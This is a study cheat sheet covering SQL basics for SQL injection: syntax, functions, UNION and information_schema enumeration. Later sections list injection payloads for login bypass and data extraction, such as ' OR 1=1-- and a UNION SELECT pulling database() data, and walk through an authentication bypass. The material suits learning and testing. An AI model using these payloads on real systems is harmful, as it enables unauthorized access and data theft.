1. Basic SQL Commands
SELECT column1, column2 FROM table_name;
SELECT * FROM users; -- Selects all columns
INSERT INTO table_name (col1, col2) VALUES ('val1', 'val2');
UPDATE table_name SET column1 = 'value' WHERE id = 1;
DELETE FROM table_name WHERE condition;
CREATE DATABASE mydb; -- Create new database
CREATE TABLE users (id INT, username VARCHAR(255)); -- Create new table
DROP TABLE users; -- Delete a table
DROP DATABASE mydb; -- Delete a database
2. WHERE Clause & Logical Operators
SELECT * FROM users WHERE username = 'admin';
SELECT * FROM users WHERE username = 'admin' AND password = '123';
SELECT * FROM users WHERE username = 'admin' OR 1=1; -- Always true
Logical Operators:
AND: both conditions must be trueOR: at least one condition must be trueNOT: reverses the result
Comparison Operators:
=equal!=or<>not equal>greater than<less than>=,<=
Order of Precedence:
- SQL evaluates
NOT>AND>ORby default. Use parentheses()to change evaluation order.
3. Comments
Used to ignore the rest of a SQL line (important for injection):
-- (double dash, MySQL and others)
# (hash, MySQL)
/* comment */ (multi-line, less common in injection)
4. Functions You’ll Use Often
database(); -- Current DB name
version(); -- DB version
user(); -- Current DB user
length(string); -- Returns length of string
substr(string,1,1);-- Substring
left(string, n); -- First n characters
right(string, n); -- Last n characters
ascii(char); -- ASCII value of character
concat(str1,str2); -- Joins strings
group_concat(col); -- Joins rows into one string
5. UNION Operator
Used to join two SELECT queries:
1 UNION SELECT 1,2,3;
Rules:
- Number of columns must match
- Data types must match (usually)
- UNION by default removes duplicates; use
UNION ALLto include all
6. information_schema (Essential for Enumeration)
SELECT table_name FROM information_schema.tables WHERE table_schema = 'db';
SELECT column_name FROM information_schema.columns WHERE table_name = 'users';
SELECT schema_name FROM information_schema.schemata; -- List all databases
Key Tables:
information_schema.tables: all tablesinformation_schema.columns: all columnsinformation_schema.schemata: all databasesinformation_schema.statistics: index informationinformation_schema.processlist: running queries (privileged)
7. LIKE and Wildcards
LIKE 'a%' -- starts with a
LIKE '%a' -- ends with a
LIKE '%a%' -- contains a
NOT LIKE 'a%' -- does not start with a
Wildcards:
%matches zero or more characters_matches a single character
8. LIMIT Clause
LIMIT 1; -- Only return one result
LIMIT 0,5; -- Skip 0, return 5 rows
9. ORDER BY Clause
ORDER BY 1 DESC; -- Sort by first column, descending
ORDER BY username ASC; -- Sort alphabetically
10. Combining Conditions in Injection
' OR 1=1-- -- Login bypass
' AND 1=2-- -- False statement
' UNION SELECT 1,2,database()-- -- Data extraction
11. Understanding the SQL Engine’s Logic Flow
- SQL evaluates conditions from left to right, applying operator precedence rules.
- It stops evaluating once the WHERE clause is satisfied (
short-circuit logic). - Injection payloads often terminate early logic and force true conditions.
- Use quotes, comments, and operator awareness to shape query execution.
Example:
SELECT * FROM users WHERE username = '$user' AND password = '$pass';
-- Injection: username = 'admin' -- , password ignored
This makes the query:
SELECT * FROM users WHERE username = 'admin'-- ' AND password = 'abc';
Result: Authentication bypass.
Pro Tips:
- Always close quotes properly in your payload.
- Use
--to comment out the rest of the query. - Use
UNIONto leak data to the page. - Use
information_schemato map the DB. - Understand how SQL interprets your injection — it’s all about logic flow and syntax control.